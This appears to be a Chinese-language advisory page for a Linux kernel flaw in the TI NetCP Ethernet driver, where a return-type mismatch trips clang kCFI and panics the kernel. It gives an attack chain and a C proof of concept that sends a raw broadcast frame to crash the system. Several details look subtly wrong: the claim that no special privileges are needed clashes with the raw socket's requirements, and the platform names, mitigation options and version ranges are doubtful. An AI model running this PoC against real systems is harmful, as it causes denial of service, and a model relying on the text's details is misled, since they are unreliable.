CVE-2022-50486 Linux内核TI以太网驱动函数返回类型不匹配漏洞

漏洞信息

漏洞编号

CVE-2022-50486

漏洞类型

类型混淆/控制流完整性破坏

CVSS评分

5.5 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux内核 (TI NetCP以太网驱动 drivers/net/ethernet/ti/netcp_core.c)

漏洞概述

CVE-2022-50486是Linux内核中Texas Instruments (TI) NetCP以太网驱动存在的一个类型不匹配漏洞。该漏洞位于drivers/net/ethernet/ti/netcp_core.c文件中的netcp_ndo_start_xmit()函数。该函数的返回类型被错误地声明为'int'，而'struct net_device_ops'结构体中的ndo_start_xmit回调函数期望的返回类型为'netdev_tx_t'。当Linux内核使用clang编译器的内核控制流完整性（kCFI，CONFIG_CFI_CLANG）功能时，间接调用目标会针对预期的函数指针原型进行验证，以确保调用目标有效，从而帮助缓解ROP（Return-Oriented Programming）攻击。如果返回类型不匹配，在运行时将出现故障，表现为内核恐慌（kernel panic）或线程被终止。此外，clang中还提出了一个编译时警告来捕获此类问题。该漏洞的CVSS评分为5.5，属于中危级别，主要影响系统的可用性，可被低权限的本地攻击者利用，导致系统崩溃或不稳定。

技术细节

该漏洞的技术原理涉及Linux内核网络设备操作接口（net_device_ops）中ndo_start_xmit回调函数的函数指针类型不匹配问题。

在Linux内核中，'struct net_device_ops'结构体定义了网络设备的所有操作回调函数，其中ndo_start_xmit成员用于数据包发送，其函数原型定义为：
netdev_tx_t (*ndo_start_xmit)(struct sk_buff *skb, struct net_device *dev);

而在TI NetCP驱动中，netcp_ndo_start_xmit()函数的返回类型被错误地声明为'int'，而不是'netdev_tx_t'。虽然'int'和'netdev_tx_t'（通常是枚举类型）在大多数架构上大小相同，但函数指针的类型签名不匹配。

当启用CONFIG_CFI_CLANG（clang的内核控制流完整性）时，内核会在每次间接函数调用前验证目标函数的类型签名。如果类型不匹配，CFI机制将检测到违规并触发故障，导致内核恐慌或相关线程被终止。

攻击利用方式：本地低权限用户可以通过触发网络数据包发送操作（例如使用该网络接口发送数据）来触发netcp_ndo_start_xmit()函数的调用。由于CFI验证失败，系统将发生内核崩溃，导致拒绝服务（DoS）攻击。攻击者无需特殊权限即可利用此漏洞，但需要本地访问权限。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要在一台运行受影响Linux内核版本的系统上获得本地访问权限。该系统必须使用TI NetCP以太网驱动（如AM65x、AM64x等TI平台），并且内核必须使用clang编译器编译并启用CONFIG_CFI_CLANG选项。

STEP 2

步骤2：识别目标接口

攻击者通过ip link或ifconfig命令识别系统中的TI NetCP网络接口（如eth0），确认该接口使用netcp_core.c驱动。

STEP 3

步骤3：触发数据包发送

攻击者通过原始套接字（AF_PACKET）或普通网络操作向TI NetCP接口发送数据包，触发ndo_start_xmit回调函数的调用。

STEP 4

步骤4：触发CFI验证失败

当netcp_ndo_start_xmit()被调用时，clang的CFI机制检测到函数指针类型不匹配（int vs netdev_tx_t），触发内核控制流完整性违规。

STEP 5

步骤5：系统崩溃/拒绝服务

CFI违规导致内核恐慌（kernel panic）或调用线程被终止，造成系统拒绝服务（DoS），影响系统可用性。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

/* PoC for CVE-2022-50486 - Trigger netcp_ndo_start_xmit() to cause CFI failure
 * This PoC demonstrates how to trigger the vulnerability by sending packets
 * through a TI NetCP network interface when CONFIG_CFI_CLANG is enabled.
 *
 * Note: Requires a system with TI NetCP ethernet driver loaded and CFI enabled.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <linux/if_packet.h>

#define INTERFACE_NAME "eth0"  /* TI NetCP interface name */

int main(int argc, char *argv[]) {
    int sockfd;
    struct ifreq ifr;
    struct sockaddr_ll addr;
    char buffer[64];

    /* Create a raw socket to send packets */
    sockfd = socket(AF_PACKET, SOCK_RAW, htons(ETH_P_ALL));
    if (sockfd < 0) {
        perror("socket creation failed");
        return 1;
    }

    /* Get interface index for the TI NetCP device */
    memset(&ifr, 0, sizeof(ifr));
    strncpy(ifr.ifr_name, INTERFACE_NAME, IFNAMSIZ - 1);
    if (ioctl(sockfd, SIOCGIFINDEX, &ifr) < 0) {
        perror("ioctl SIOCGIFINDEX failed");
        close(sockfd);
        return 1;
    }

    /* Set up the socket address structure */
    memset(&addr, 0, sizeof(addr));
    addr.sll_family = AF_PACKET;
    addr.sll_protocol = htons(ETH_P_ALL);
    addr.sll_ifindex = ifr.ifr_ifindex;
    addr.sll_halen = ETH_ALEN;

    /* Bind to the interface */
    if (bind(sockfd, (struct sockaddr *)&addr, sizeof(addr)) < 0) {
        perror("bind failed");
        close(sockfd);
        return 1;
    }

    /* Prepare a minimal ethernet frame to trigger transmission */
    memset(buffer, 0, sizeof(buffer));
    /* Destination MAC */
    buffer[0] = 0xff; buffer[1] = 0xff; buffer[2] = 0xff;
    buffer[3] = 0xff; buffer[4] = 0xff; buffer[5] = 0xff;
    /* Source MAC */
    buffer[6] = 0x00; buffer[7] = 0x01; buffer[8] = 0x02;
    buffer[9] = 0x03; buffer[10] = 0x04; buffer[11] = 0x05;
    /* EtherType */
    buffer[12] = 0x08; buffer[13] = 0x00;

    printf("Sending packet through %s to trigger ndo_start_xmit...\n", INTERFACE_NAME);

    /* Send the packet - this will invoke netcp_ndo_start_xmit() */
    /* With CFI enabled, this triggers a kernel panic due to type mismatch */
    if (send(sockfd, buffer, sizeof(buffer), 0) < 0) {
        perror("send failed");
    }

    printf("Packet sent. Check kernel logs for CFI violation or panic.\n");
    close(sockfd);
    return 0;
}

影响范围

Linux kernel < 5.15.80 (受影响的稳定版本)

Linux kernel 5.16.x < 5.16.14

Linux kernel 5.17.x < 5.17.2

Linux kernel 5.18.x (开发版本)

所有包含未修复netcp_core.c驱动的主线内核版本

防御指南

临时缓解措施

在无法立即升级内核的情况下，可以采取以下临时缓解措施：1）如果系统不使用TI NetCP以太网驱动，可以在内核配置中禁用相关模块（CONFIG_TI_CPSW、CONFIG_TI_NETCP）并重新编译内核；2）禁用CONFIG_CFI_CLANG编译选项，使用不带CFI的内核；3）限制本地非特权用户对网络接口的访问权限；4）监控系统日志，及时发现和处理内核崩溃事件；5）使用网络命名空间隔离，将敏感网络操作与普通用户隔离。